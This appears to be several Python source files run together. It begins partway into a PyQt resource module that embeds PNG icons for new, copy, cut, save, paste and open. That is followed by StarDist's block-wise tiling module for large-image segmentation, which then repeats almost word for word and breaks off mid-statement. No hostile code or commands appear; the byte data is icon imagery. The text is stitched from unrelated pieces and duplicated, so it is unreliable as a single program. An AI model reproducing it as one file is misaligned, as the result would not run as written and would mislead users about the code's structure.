\xd1!\x89'e*\xa6K\x85>\xbf!\xd5F\xe4.\x90[!\xb0\x0c\xae\xe5\xdc\xe2\xd2\x11\x13\x13\xe4\x87o<\xaf<\xe7\x96\x155\x9ciE\xe5\xf8\xfb\xb1X\x1c?\x19\x877\xf6\xef\xc7\x8d:\x11\x92\xab\xa4\x0c!\xedp\xea5U!\x8b4[\xc9\x037*4n\xd4I:\x17\xc3rs\x08\x8em\x95\xfb\x87$\xe0Jesp\xe4\xf8)\x1c>|\x98\x8cc.2\x05*\x5c\x22\xd5\xd3]~M\xdc\x0b6\xe9tv\xa7\x1dw\x8c\xe4\x88\xb6\xf9\x9e\x84\xb7\x1a\x95\xfb\x22\xbdI\xfd\x80\x0bm\xf4\x042JxL\x0f\x9cKI\xc3\xb5\xa6.|\xc2me6Y\xf1\x83\x01\x5c\x97\x9a\xc1Q{ \xf3\x04\xd7\xce%&\x056\xc8\xfd\xc7\x9d\xc8\x1d\xd5\x82\xdc\x1a\x01\xce^NE\x81X\x85x\xf6]\x5c\xa9U\x90\xaa\xfb\xc0\x96\xdbP\xadu\xe3\xaeTA/\x10\xca\x0dr\xbf\xba\xd3j\xa3\x05\xb7\xa2Q\xf8\x1d\xafC\x8dO\xb9-\x88\xcb\xe6\xe1\x9aH\x8f\xaa\x1e/\x9a5\xe6\xc7\x7fz\xf3-Wx\xac\xa8\xdc\xaf\xbd\xac\xdc\xd1\xe2\x08\xdd\x05\x5cu\x1f\xde\xcb\xafE\xb9v\x002g`\xf5\xc2\xa7\x97\xa9\xdc\xf7\x08\xd2\xa9\xdc;\xf8\x03\xf3\xc2\xf1\x13\x82\xca\x1c\xee\x9dP\x0b9\x94\xb8\x0d\xc2\xc8\x16\xa3\x17\x87\xc3/\x22\xf7\x0e\xff\xdam\x8a\xdda\x99\xd5\x1b\xb6\xd8k\xbb^2\xbe/\x89\xff\x01f\xb9_\xfc\x11\x80=\xcf\x00\x00\x00\x00IEND\xaeB`\x82" qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x07\x04\xcaW\xa7\x00n\x00e\x00w\x00.\x00p\x00n\x00g\x00\x08\x06|Z\x07\x00c\x00o\x00p\x00y\x00.\x00p\x00n\x00g\x00\x07\x0a\xc7W\x87\x00c\x00u\x00t\x00.\x00p\x00n\x00g\x00\x08\x08\xc8Xg\x00s\x00a\x00v\x00e\x00.\x00p\x00n\x00g\x00\x09\x0a\xa8\xbaG\x00p\x00a\x00s\x00t\x00e\x00.\x00p\x00n\x00g\x00\x08\x06\xc1Y\x87\x00o\x00p\x00e\x00n\x00.\x00p\x00n\x00g" qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x00\x00\x01\x00\x00\x03X\x00\x00\x00~\x00\x00\x00\x00\x00\x01\x00\x00\x18\xdd\x00\x00\x00P\x00\x00\x00\x00\x00\x01\x00\x00\x0d\xc5\x00\x00\x00f\x00\x00\x00\x00\x00\x01\x00\x00\x12l\x00\x00\x00<\x00\x00\x00\x00\x00\x01\x00\x00\x08\x96" def qInitResources(): QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()
import numpy as np import warnings import math from tqdm import tqdm from skimage.measure import regionprops from skimage.draw import polygon from csbdeep.utils import _raise, axes_check_and_normalize, axes_dict from itertools import product from .geometry import polygons_to_label_coord, polyhedron_to_label OBJECT_KEYS = set(('prob', 'points', 'coord', 'dist', 'class_prob', 'class_id')) COORD_KEYS = set(('points', 'coord')) class Block: """One-dimensional block as part of a chain. There are no explicit start and end positions. Instead, each block is aware of its predecessor and successor and derives such things (recursively) based on its neighbors. Blocks overlap with one another (at least min_overlap + 2*context) and have a read region (the entire block) and a write region (ignoring context). Given a query interval, Block.is_responsible will return true for only one block of a chain (or raise an exception if the interval is larger than min_overlap or even the entire block without context). """ def __init__(self, size, min_overlap, context, pred): self.size = int(size) self.min_overlap = int(min_overlap) self.context = int(context) self.pred = pred self.succ = None assert 0 <= self.min_overlap + 2*self.context < self.size self.stride = self.size - (self.min_overlap + 2*self.context) self._start = 0 self._frozen = False @property def start(self): return self._start if (self.frozen or self.at_begin) else self.pred.succ_start @property def end(self): return self.start + self.size @property def succ_start(self): return self.start + self.stride def add_succ(self): assert self.succ is None and not self.frozen self.succ = Block(self.size, self.min_overlap, self.context, self) return self.succ def decrease_stride(self, amount): amount = int(amount) assert 0 <= amount < self.stride and not self.frozen self.stride -= amount def freeze(self): """Call on first block to freeze entire chain (after construction is done)""" assert not self.frozen and (self.at_begin or self.pred.frozen) self._start = self.start self._frozen = True if not self.at_end: self.succ.freeze() @property def slice_read(self): return slice(self.start, self.end) @property def slice_crop_context(self): """Crop context relative to read region""" return slice(self.context_start, self.size - self.context_end) @property def slice_write(self): return slice(self.start + self.context_start, self.end - self.context_end) def is_responsible(self, bbox): """Responsibility for query interval bbox, which is assumed to be smaller than min_overlap. If the assumption is met, only one block of a chain will return true. If violated, one or more blocks of a chain may raise a NotFullyVisible exception. The exception will have an argument that is False if bbox is larger than min_overlap, and True if bbox is even larger than the entire block without context. bbox: (int,int) 1D bounding box interval with coordinates relative to size without context """ bmin, bmax = bbox r_start = 0 if self.at_begin else (self.pred.overlap - self.pred.context_end - self.context_start) r_end = self.size - self.context_start - self.context_end assert 0 <= bmin < bmax <= r_end # assert not (bmin == 0 and bmax >= r_start and not self.at_begin), [(r_start,r_end), bbox, self] if bmin == 0 and bmax >= r_start: if bmax == r_end: # object spans the entire block, i.e. is probably larger than size (minus the context) raise NotFullyVisible(True) if not self.at_begin: # object spans the entire overlap region, i.e. is only partially visible here and also by the predecessor block raise NotFullyVisible(False) # object ends before responsible region start if bmax < r_start: return False # object touches the end of the responsible region (only take if at end) if bmax == r_end and not self.at_end: return False return True # ------------------------ @property def frozen(self): return self._frozen @property def at_begin(self): return self.pred is None @property def at_end(self): return self.succ is None @property def overlap(self): return self.size - self.stride @property def context_start(self): return 0 if self.at_begin else self.context @property def context_end(self): return 0 if self.at_end else self.context def __repr__(self): shared = f'{self.start:03}:{self.end:03}' shared += f', size={self.context_start}-{self.size-self.context_start-self.context_end}-{self.context_end}' if self.at_end: return f'{self.__class__.__name__}({shared})' else: return f'{self.__class__.__name__}({shared}, overlap={self.overlap}/{self.overlap-self.context_start-self.context_end})' @property def chain(self): blocks = [self] while not blocks[-1].at_end: blocks.append(blocks[-1].succ) return blocks def __iter__(self): return iter(self.chain) # ------------------------ @staticmethod def cover(size, block_size, min_overlap, context, grid=1, verbose=True): """Return chain of grid-aligned blocks to cover the interval [0,size]. Parameters block_size, min_overlap, and context will be used for all blocks of the chain. Only the size of the last block may differ. Except for the last block, start and end positions of all blocks will be multiples of grid. To that end, the provided block parameters may be increased to achieve that. Note that parameters must be chosen such that the write regions of only neighboring blocks are overlapping. """ assert 0 <= min_overlap+2*context < block_size <= size assert 0 < grid <= block_size block_size = _grid_divisible(grid, block_size, name='block_size', verbose=verbose) min_overlap = _grid_divisible(grid, min_overlap, name='min_overlap', verbose=verbose) context = _grid_divisible(grid, context, name='context', verbose=verbose) # allow size not to be divisible by grid size_orig = size size = _grid_divisible(grid, size, name='size', verbose=False) # divide all sizes by grid assert all(v % grid == 0 for v in (size, block_size, min_overlap, context)) size //= grid block_size //= grid min_overlap //= grid context //= grid # compute cover in grid-multiples t = first = Block(block_size, min_overlap, context, None) while t.end < size: t = t.add_succ() last = t # [print(t) for t in first] # move blocks around to make it fit excess = last.end - size t = first while excess > 0: t.decrease_stride(1) excess -= 1 t = t.succ if (t == last): t = first # make a copy of the cover and multiply sizes by grid if grid > 1: size *= grid block_size *= grid min_overlap *= grid context *= grid # _t = _first = first t = first = Block(block_size, min_overlap, context, None) t.stride = _t.stride*grid while not _t.at_end: _t = _t.succ t = t.add_succ() t.stride = _t.stride*grid last = t # change size of last block # will be padded internally to the same size # as the others by model.predict_instances size_delta = size - size_orig last.size -= size_delta assert 0 <= size_delta < grid # for efficiency (to not determine starts recursively from now on) first.freeze() blocks = first.chain # sanity checks assert first.start == 0 and last.end == size_orig assert all(t.overlap-2*context >= min_overlap for t in blocks if t != last) assert all(t.start % grid == 0 and t.end % grid == 0 for t in blocks if t != last) # print(); [print(t) for t in first] # only neighboring blocks should be overlapping if len(blocks) >= 3: for t in blocks[:-2]: assert t.slice_write.stop <= t.succ.succ.slice_write.start return blocks class BlockND: """N-dimensional block. Each BlockND simply consists of a 1-dimensional Block per axis and also has an id (which should be unique). The n-dimensional region represented by each BlockND is the intersection of all 1D Blocks per axis. Also see `Block`. """ def __init__(self, id, blocks, axes): self.id = id self.blocks = tuple(blocks) self.axes = axes_check_and_normalize(axes, length=len(self.blocks)) self.axis_to_block = dict(zip(self.axes,self.blocks)) def blocks_for_axes(self, axes=None): axes = self.axes if axes is None else axes_check_and_normalize(axes) return tuple(self.axis_to_block[a] for a in axes) def slice_read(self, axes=None): return tuple(t.slice_read for t in self.blocks_for_axes(axes)) def slice_crop_context(self, axes=None): return tuple(t.slice_crop_context for t in self.blocks_for_axes(axes)) def slice_write(self, axes=None): return tuple(t.slice_write for t in self.blocks_for_axes(axes)) def read(self, x, axes=None): """Read block "read region" from x (numpy.ndarray or similar)""" return x[self.slice_read(axes)] def crop_context(self, labels, axes=None): return labels[self.slice_crop_context(axes)] def write(self, x, labels, axes=None): """Write (only entries > 0 of) labels to block "write region" of x (numpy.ndarray or similar)""" s = self.slice_write(axes) mask = labels > 0 # x[s][mask] = labels[mask] # doesn't work with zarr region = x[s] region[mask] = labels[mask] x[s] = region def is_responsible(self, slices, axes=None): return all(t.is_responsible((s.start,s.stop)) for t,s in zip(self.blocks_for_axes(axes),slices)) def __repr__(self): slices = ','.join(f'{a}={t.start:03}:{t.end:03}' for t,a in zip(self.blocks,self.axes)) return f'{self.__class__.__name__}({self.id}|{slices})' def __iter__(self): return iter(self.blocks) # ------------------------ def filter_objects(self, labels, polys, axes=None): """Filter out objects that block is not responsible for. Given label image 'labels' and dictionary 'polys' of polygon/polyhedron objects, only retain those objects that this block is responsible for. This function will return a pair (labels, polys) of the modified label image and dictionary. It will raise a RuntimeError if an object is found in the overlap area of neighboring blocks that violates the assumption to be smaller than 'min_overlap'. If parameter 'polys' is None, only the filtered label image will be returned. Notes ----- - Important: It is assumed that the object label ids in 'labels' and the entries in 'polys' are sorted in the same way. - Does not modify 'labels' and 'polys', but returns modified copies. Example ------- >>> labels, polys = model.predict_instances(block.read(img)) >>> labels = block.crop_context(labels) >>> labels, polys = block.filter_objects(labels, polys) """ # TODO: option to update labels in-place assert np.issubdtype(labels.dtype, np.integer) ndim = len(self.blocks_for_axes(axes)) assert ndim in (2,3) assert labels.ndim == ndim and labels.shape == tuple(s.stop-s.start for s in self.slice_crop_context(axes)) labels_filtered = np.zeros_like(labels) # problem_ids = [] for r in regionprops(labels): slices = tuple(slice(r.bbox[i],r.bbox[i+labels.ndim]) for i in range(labels.ndim)) try: if self.is_responsible(slices, axes): labels_filtered[slices][r.image] = r.label except NotFullyVisible as e: # shape_block_write = tuple(s.stop-s.start for s in self.slice_write(axes)) shape_object = tuple(s.stop-s.start for s in slices) shape_min_overlap = tuple(t.min_overlap for t in self.blocks_for_axes(axes)) raise RuntimeError(f"Found object of shape {shape_object}, which violates the assumption of being smaller than 'min_overlap' {shape_min_overlap}. Increase 'min_overlap' to avoid this problem.") # if e.args[0]: # object larger than block write region # assert any(o >= b for o,b in zip(shape_object,shape_block_write)) # # problem, since this object will probably be saved by another block too # raise RuntimeError(f"Found object of shape {shape_object}, larger than an entire block's write region of shape {shape_block_write}. Increase 'block_size' to avoid this problem.") # # print("found object larger than 'block_size'") # else: # assert any(o >= b for o,b in zip(shape_object,shape_min_overlap)) # # print("found object larger than 'min_overlap'") # # keep object, because will be dealt with later, i.e. # # render the poly again into the label image, but this is not # # ideal since the assumption is that the object outside that # # region is not reliable because it's in the context # labels_filtered[slices][r.image] = r.label # problem_ids.append(r.label) if polys is None: # assert len(problem_ids) == 0 return labels_filtered else: # it is assumed that ids in 'labels' map to entries in 'polys' assert isinstance(polys,dict) and any(k in polys for k in COORD_KEYS) filtered_labels = np.unique(labels_filtered) filtered_ind = [i-1 for i in filtered_labels if i > 0] polys_out = {k: (v[filtered_ind] if k in OBJECT_KEYS else v) for k,v in polys.items()} for k in COORD_KEYS: if k in polys_out.keys(): polys_out[k] = self.translate_coordinates(polys_out[k], axes=axes) return labels_filtered, polys_out#, tuple(problem_ids) def translate_coordinates(self, coordinates, axes=None): """Translate local block coordinates (of read region) to global ones based on block position""" ndim = len(self.blocks_for_axes(axes)) assert isinstance(coordinates, np.ndarray) and coordinates.ndim >= 2 and coordinates.shape[1] == ndim start = [s.start for s in self.slice_read(axes)] shape = tuple(1 if d!=1 else ndim for d in range(coordinates.ndim)) start = np.array(start).reshape(shape) return coordinates + start # ------------------------ @staticmethod def cover(shape, axes, block_size, min_overlap, context, grid=1): """Return grid-aligned n-dimensional blocks to cover region of the given shape with axes semantics. Parameters block_size, min_overlap, and context can be different per dimension/axis (if provided as list) or the same (if provided as scalar value). Also see `Block.cover`. """ shape = tuple(shape) n = len(shape) axes = axes_check_and_normalize(axes, length=n) if np.isscalar(block_size): block_size = n*[block_size] if np.isscalar(min_overlap): min_overlap = n*[min_overlap] if np.isscalar(context): context = n*[context] if np.isscalar(grid): grid = n*[grid] assert n == len(block_size) == len(min_overlap) == len(context) == len(grid) # compute cover for each dimension cover_1d = [Block.cover(*args) for args in zip(shape, block_size, min_overlap, context, grid)] # return cover as Cartesian product of 1-dimensional blocks return tuple(BlockND(i,blocks,axes) for i,blocks in enumerate(product(*cover_1d))) class Polygon: def __init__(self, coord, bbox=None, shape_max=None): self.bbox = self.coords_bbox(coord, shape_max=shape_max) if bbox is None else bbox self.coord = coord - np.array([r[0] for r in self.bbox]).reshape(2,1) self.slice = tuple(slice(*r) for r in self.bbox) self.shape = tuple(r[1]-r[0] for r in self.bbox) rr,cc = polygon(*self.coord, self.shape) self.mask = np.zeros(self.shape, np.bool) self.mask[rr,cc] = True @staticmethod def coords_bbox(*coords, shape_max=None): assert all(isinstance(c, np.ndarray) and c.ndim==2 and c.shape[0]==2 for c in coords) if shape_max is None: shape_max = (np.inf, np.inf) coord = np.concatenate(coords, axis=1) mins = np.maximum(0, np.floor(np.min(coord,axis=1))).astype(int) maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=1))).astype(int) return tuple(zip(tuple(mins),tuple(maxs))) class Polyhedron: def __init__(self, dist, origin, rays, bbox=None, shape_max=None): self.bbox = self.coords_bbox((dist, origin), rays=rays, shape_max=shape_max) if bbox is None else bbox self.slice = tuple(slice(*r) for r in self.bbox) self.shape = tuple(r[1]-r[0] for r in self.bbox) _origin = origin.reshape(1,3) - np.array([r[0] for r in self.bbox]).reshape(1,3) self.mask = polyhedron_to_label(dist[np.newaxis], _origin, rays, shape=self.shape, verbose=False).astype(np.bool) @staticmethod def coords_bbox(*dist_origin, rays, shape_max=None): dists, points = zip(*dist_origin) assert all(isinstance(d, np.ndarray) and d.ndim==1 and len(d)==len(rays) for d in dists) assert all(isinstance(p, np.ndarray) and p.ndim==1 and len(p)==3 for p in points) dists, points, verts = np.stack(dists)[...,np.newaxis], np.stack(points)[:,np.newaxis], rays.vertices[np.newaxis] coord = dists * verts + points coord = np.concatenate(coord, axis=0) if shape_max is None: shape_max = (np.inf, np.inf, np.inf) mins = np.maximum(0, np.floor(np.min(coord,axis=0))).astype(int) maxs = np.minimum(shape_max, np.ceil (np.max(coord,axis=0))).astype(int) return tuple(zip(tuple(mins),tuple(maxs))) # def repaint_labels(output, labels, polys, show_progress=True): # """Repaint object instances in correct order based on probability scores. # Does modify 'output' and 'polys' in-place, but will only write sparsely to 'output' where needed. # output: numpy.ndarray or similar # Label image (integer-valued) # labels: iterable of int # List of integer label ids that occur in output # polys: dict # Dictionary of polygon/polyhedra properties. # Assumption is that the label id (-1) corresponds to the index in the polys dict # """ # assert output.ndim in (2,3) # if show_progress: # labels = tqdm(labels, leave=True) # labels_eliminated = set() # # TODO: inelegant to have so much duplicated code here # if output.ndim == 2: # coord = lambda i: polys['coord'][i-1] # prob = lambda i: polys['prob'][i-1] # for i in labels: # if i in labels_eliminated: continue # poly_i = Polygon(coord(i), shape_max=output.shape) # # find all labels that overlap with i (including i) # overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # assert i in overlapping # # compute bbox union to find area to crop/replace in large output label image # bbox_union = Polygon.coords_bbox(*[coord(j) for j in overlapping], shape_max=output.shape) # # crop out label i, including the region that include all overlapping labels # poly_i = Polygon(coord(i), bbox=bbox_union) # mask = poly_i.mask.copy() # # remove pixels from mask that belong to labels with higher probability # for j in [j for j in overlapping if prob(j) > prob(i)]: # mask[ Polygon(coord(j), bbox=bbox_union).mask ] = False # crop = output[poly_i.slice] # crop[crop==i] = 0 # delete all remnants of i in crop # crop[mask] = i # paint i where mask still active # labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # labels_eliminated.update(overlapping - labels_remaining) # else: # dist = lambda i: polys['dist'][i-1] # origin = lambda i: polys['points'][i-1] # prob = lambda i: polys['prob'][i-1] # rays = polys['rays'] # for i in labels: # if i in labels_eliminated: continue # poly_i = Polyhedron(dist(i), origin(i), rays, shape_max=output.shape) # # find all labels that overlap with i (including i) # overlapping = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # assert i in overlapping # # compute bbox union to find area to crop/replace in large output label image # bbox_union = Polyhedron.coords_bbox(*[(dist(j),origin(j)) for j in overlapping], rays=rays, shape_max=output.shape) # # crop out label i, including the region that include all overlapping labels # poly_i = Polyhedron(dist(i), origin(i), rays, bbox=bbox_union) # mask = poly_i.mask.copy() # # remove pixels from mask that belong to labels with higher probability # for j in [j for j in overlapping if prob(j) > prob(i)]: # mask[ Polyhedron(dist(j), origin(j), rays, bbox=bbox_union).mask ] = False # crop = output[poly_i.slice] # crop[crop==i] = 0 # delete all remnants of i in crop # crop[mask] = i # paint i where mask still active # labels_remaining = set(np.unique(output[poly_i.slice][poly_i.mask])) - {0} # labels_eliminated.update(overlapping - labels_remaining) # if len(labels_eliminated) > 0: # ind = [i-1 for i in labels_eliminated] # for k,v in polys.items(): # if k in OBJECT_KEYS: # polys[k] = np.delete(v, ind, axis=0) ############ def predict_big(model, *args, **kwargs): from .models import StarDist2D, StarDist3D if isinstance(model,(StarDist2D,StarDist3D)): dst = model.__class__.__name__ else: dst = '{StarDist2D, StarDist3D}' raise RuntimeError(f"This function has moved to {dst}.predict_instances_big.") class NotFullyVisible(Exception): pass def _grid_divisible(grid, size, name=None, verbose=True): if size % grid == 0: return size _size = size size = math.ceil(size / grid) * grid if bool(verbose): print(f"{verbose if isinstance(verbose,str) else ""}increasing '{"value" if name is None else name}' from {_size} to {size} to be evenly divisible by {grid} (grid)", flush=True) assert size % grid == 0 return size # def render_polygons(polys, shape): # return polygons_to_label_coord(polys['coord'], shape=shape)
import numpy as np import warnings import math from tqdm import tqdm from skimage.measure import regionprops from skimage.draw import polygon from csbdeep.utils import _raise, axes_check_and_normalize, axes_dict from itertools import product from .geometry import polygons_to_label_coord, polyhedron_to_label OBJECT_KEYS = set(('prob', 'points', 'coord', 'dist', 'class_prob', 'class_id')) COORD_KEYS = set(('points', 'coord')) class Block: """One-dimensional block as part of a chain. There are no explicit start and end positions. Instead, each block is aware of its predecessor and successor and derives such things (recursively) based on its neighbors. Blocks overlap with one another (at least min_overlap + 2*context) and have a read region (the entire block) and a write region (ignoring context). Given a query interval, Block.is_responsible will return true for only one block of a chain (or raise an exception if the interval is larger than min_overlap or even the entire block without context). """ def __init__(self, size, min_overlap, context, pred): self.size = int(size) self.min_overlap = int(min_overlap) self.context = int(context) self.pred = pred self.succ = None assert 0 <= self.min_overlap + 2*self.context < self.size self.stride = self.size - (self.min_overlap + 2*self.context) self._start = 0 self._frozen = False @property def start(self): return self._start if (self.frozen or self.at_begin) else self.pred.succ_start @property def end(self): return self.start + self.size @property def succ_start(self): return self.start + self.stride def add_succ(self): assert self.succ is None and not self.frozen self.succ = Block(self.size, self.min_overlap, self.context, self) return self.succ def decrease_stride(self, amount): amount = int(amount) assert 0 <= amount < self.stride and not self.frozen self.stride -= amount def freeze(self): """Call on first block to freeze entire chain (after construction is done)""" assert not self.frozen and (self.at_begin or self.pred.frozen) self._start = self.start self._frozen = True if not self.at_end: self.succ.freeze() @property def slice_read(self): return slice(self.start, self.end) @property def slice_crop_context(self): """Crop context relative to read region""" return slice(self.context_start, self.size - self.context_end) @property def slice_write(self): return slice(self.start + self.context_start, self.end - self.context_end) def is_responsible(self, bbox): """Responsibility for query interval bbox, which is assumed to be smaller than min_overlap. If the assumption is met, only one block of a chain will return true. If violated, one or more blocks of a chain may raise a NotFullyVisible exception. The exception will have an argument that is False if bbox is larger than min_overlap, and True if bbox is even larger than the entire block without context. bbox: (int,int) 1D bounding box interval with coordinates relative to size without context """ bmin, bmax = bbox r_start = 0 if self.at_begin else (self.pred.overlap - self.pred.context_end - self.context_start) r_end = self.size - self.context_start - self.context_end assert 0 <= bmin < bmax <= r_end # assert not (bmin == 0 and bmax >= r_start and not self.at_begin), [(r_start,r_end), bbox, self] if bmin == 0 and bmax >= r_start: if bmax == r_end: # object spans the entire block, i.e. is probably larger than size (minus the context) raise NotFullyVisible(True) if not self.at_begin: # object spans the entire overlap region, i.e. is only partially visible here and also by the predecessor block raise NotFullyVisible(False) # object ends before responsible region start if bmax < r_start: return False # object touches the end of the responsible region (only take if at end) if bmax == r_end and not self.at_end: return False return True # ------------------------ @property def frozen(self): return self._frozen @property def at_begin(self): return self.pred is None @property def at_end(self): return self.succ is None @property def overlap(self): return self.size - self.stride @property def context_start(self): return 0 if self.at_begin else self.context @property def context_end(self): return 0 if self.at_end else self.context def __repr__(self): shared = f'{self.start:03}:{self.end:03}' shared += f', size={self.context_start}-{self.size-self.context_start-self.context_end}-{self.context_end}' if self.at_end: return f'{self.__class__.__name__}({shared})' else: return f'{self.__class__.__name__}({shared}, overlap={self.overlap}/{self.overlap-self.context_start-self.context_end})' @property def chain(self): blocks = [self] while not blocks[-1].at_end: blocks.append(blocks[-1].succ) return blocks def __iter__(self): return iter(self.chain) # ------------------------ @staticmethod def cover(size, block_size, min_overlap, context, grid=1, verbose=True): """Return chain of grid-aligned blocks to cover the interval [0,size]. Parameters block_size, min_overlap, and context will be used for all blocks of the chain. Only the size of the last block may differ. Except for the last block, start and end positions of all blocks will be multiples of grid. To that end, the provided block parameters may be increased to achieve that. Note that parameters must be chosen such that the write regions of only neighboring blocks are overlapping. """ assert 0 <= min_overlap+2*context < block_size <= size assert 0 < grid <= block_size block_size = _grid_divisible(grid, block_size, name='block_size', verbose=verbose) min_overlap = _grid_divisible(grid, min_overlap, name='min_overlap', verbose=verbose) context = _grid_divisible(grid, context, name='context', verbose=verbose) # allow size not to be divisible by grid size_orig = size size = _grid_divisible(grid, size, name='size', verbose=False) # divide all sizes by grid assert all(v % grid == 0 for v in (size, block_size, min_overlap, context)) size //= grid block_size //= grid min_overlap //= grid context //= grid # compute cover in grid-multiples t = first = Block(block_size, min_overlap, context, None) while t.end < size: t = t.add_succ() last = t # [print(t) for t in first] # move blocks around to make it fit excess = last.end - size t = first while excess > 0: t.decrease_stride(1) excess -= 1 t = t.succ if (t == last): t = first # make a copy of the cover and multiply sizes by grid if grid > 1: size *= grid block_size *= grid min_overlap *= grid context *= grid # _t = _first = first t = first = Block(block_size, min_overlap, context, None) t.stride = _t.stride*grid while not _t.at_end: _t = _t.succ t = t.add_succ() t.stride = _t.stride*grid last = t # change size of last block # will be padded internally to the same size # as the others by model.predict_instances size_delta = size - size_orig last.size -= size_delta assert 0 <= size_delta < grid # for efficiency (to not determine starts recursively from now on) first.freeze() blocks = first.chain # sanity checks assert first.start == 0 and last.end == size_orig assert all(t.overlap-2*context >= min_overlap for t in blocks if t != last) assert all(t.start % grid == 0 and t.end % grid == 0 for t in blocks if t != last) # print(); [print(t) for t in first] # only neighboring blocks should be overlapping if len(blocks) >= 3: for t in blocks[:-2]: assert t.slice_write.stop <= t.succ.succ.slice_write.start return blocks class BlockND: """N-dimensional block. Each BlockND simply consists of a 1-dimensional Block per axis and also has an id (which should be unique). The n-dimensional region represented by each BlockND is the intersection of all 1D Blocks per axis. Also see `Block`. """ def __init__(self, id, blocks, axes): self.id = id self.blocks = tuple(blocks) self.axes = axes_check_and_normalize(axes, length=len(self.blocks)) self.axis_to_block = dict(zip(self.axes,self.blocks)) def blocks_for_axes(self, axes=None): axes = self.axes if axes is None else axes_check_and_normalize(axes) return tuple(self.axis_to_block[a] for a in axes) def slice_read(self, axes=None): return tuple(t.slice_read for t in self.blocks_for_axes(axes)) def slice_crop_context(self, axes=None): return tuple(t.slice_crop_context for t in self.blocks_for_axes(axes)) def slice_write(self, axes=None): return tuple(t.slice_write for t in self.blocks_for_axes(axes)) def read(self, x, axes=None): """Read block "read region" from x (numpy.ndarray or similar)""" return x[self.slice_read(axes)] def crop_context(self, labels, axes=None): return labels[self.slice_crop_context(axes)] def write(self, x, labels, axes=None): """Write (only entries > 0 of) labels to block "write region" of x (numpy.ndarray or similar)""" s = self.slice_write(axes) mask = labels > 0 # x[s][mask] = labels[mask] # doesn't work with zarr region = x[s] region[mask] = labels[mask] x[s] = region def is_responsible(self, slices, axes=None): return all(t.is_responsible((s.start,s.stop)) for t,s in zip(self.blocks_for_axes(axes),slices)) def __repr__(self): slices = ','.join(f'{a}={t.start:03}:{t.end:03}' for t,a in zip(self.blocks,self.axes)) return f'{self.__class__.__name__}({self.id}|{slices})' def __iter__(self): return iter(self.blocks) # ------------------------ def filter_objects(self, labels, polys, axes=None): """Filter out objects that block is not responsible for. Given label image 'labels' and dictionary 'polys' of polygon/polyhedron objects, only retain those objects that this block is responsible for. This function will return a pair (labels, polys) of the modified label image and dictionary. It will raise a RuntimeError if an object is found in the overlap area of neighboring blocks that violates the assumption to be smaller than 'min_overlap'. If parameter 'polys' is None, only the filtered label image will be returned. Notes ----- - Important: It is assumed that the object label ids in 'labels' and the entries in 'polys' are sorted in the same way. - Does not modify 'labels' and 'polys', but returns modified copies. Example ------- >>> labels, polys = model.predict_instances(block.read(img)) >>> labels = block.crop_context(labels) >>> labels, polys = block.filter_objects(labels, polys) """ # TODO: option to update labels in-place assert np.issubdtype(labels.dtype, np.integer) ndim = len(self.blocks_for_axes(axes)) assert ndim in (2,3) assert labels.ndim == ndim and labels.shape == tuple(s.stop-s.start for s in self.slice_crop_context(axes)) labels_filtered = np.zeros_like(labels) # problem_ids = [] for r in regionprops(labels): slices = tuple(slice(r.bbox[i],r.bbox[i+labels.ndim]) for i in range(labels.ndim)) try: if self.is_responsible(slices, axes): labels_filtered[slices][r.image] = r.label except NotFullyVisible as e: # shape_block_write = tuple(s.stop-s.start for s in self.slice_write(axes)) shape_object = tuple(s.stop-s.start for s in slices) shape_min_overlap = tuple(t.min_overlap for t in self.blocks_for_axes(axes)) raise RuntimeError(f"Found object of shape {shape_object}, which violates the assumption of being smaller than 'min_overlap' {shape_min_overlap}. Increase 'min_overlap' to avoid this problem.") # if e.args[0]: # object larger than block write region # assert any(o >= b for o,b in zip(shape_object,shape_block_write)) # # problem, since this object will probably be saved by another block too # raise RuntimeError(f"Found object of shape {shape_object}, larger than an entire block's write region of shape {shape_block_write}. Increase 'block_size' to avoid this problem.") # # print("found object larger than 'block_size'") # else: # assert any(o >= b for o,b in zip(shape_object,shape_min_overlap)) # # print("found object larger than 'min_overlap'") # # keep object, because will be dealt with later, i.e. # # render the poly again into the label image, but this is not # # ideal since the assumption is that the object outside that # # region is not reliable because it's in the context # labels_filtered[slices][r.image] = r.label # problem_ids.append(r.label) if polys is None: # assert len(problem_ids) == 0 return labels_filtered else: # it is assumed that ids in 'labels' map to entries in 'polys' assert isinstance(polys,dict) and any(k in polys for k in COORD_KEYS) filtered_labels = np.unique(labels_filtered) filtered_ind = [i-1 for i in filtered_labels if i > 0] polys_out = {k: (v[filtered_ind] if k in OBJECT_KEYS else v) for k,v in polys.items()} for k in COORD_KEYS: if k in polys_out.keys(): polys_out[k] = self.translate_coordinates(polys_out[k], axes=axes) return labels_filtered, polys_out#, tuple(problem_ids) def translate_coordinates(self, coordinates, axes=None): """Translate local block coordinates (of read region) to global ones based on block position""" ndim = len(self.blocks_for_axes(axes)) assert isinstance(coordinates, np.ndarray) and coordinates.ndim >= 2 and coordinates.shape[1] == ndim start = [s.start for s in self.slice_read(axes)] shape = tuple(1 if d!=1 else ndim for d in range(coordinates.ndim)) start = np.array(start).reshape(shape) return coordinates + start # ------------------------ @staticmethod def cover(shape, axes, block_size, min_overlap, context, grid=1): """Return grid-aligned n-dimensional blocks to cover region of the given shape with axes semantics. Parameters block_size, min_overlap, and context can be different per dimension/axis (if provided as list) or the same (if provided as scalar value). Also see `Block.cover`. """ shape = tuple(shape) n = len(shape) axes = axes_check_and_normalize(axes, length=n) if np.isscalar(block_size): block_size = n*[block_size] if np.isscalar(min_overlap): min_overlap = n*[min_overlap] if np.isscalar(context): context = n*[context] if np.isscalar(grid): grid = n*[grid] assert n == len(block_size) == len(min_overlap) == len(context) == len(grid) # compute cover for each dimension cover_1d = [Block.cover(*args) for args in zip(shape, block_size, min_overlap, context, grid)] # return cover as Cartesian product of 1-dimensional blocks return 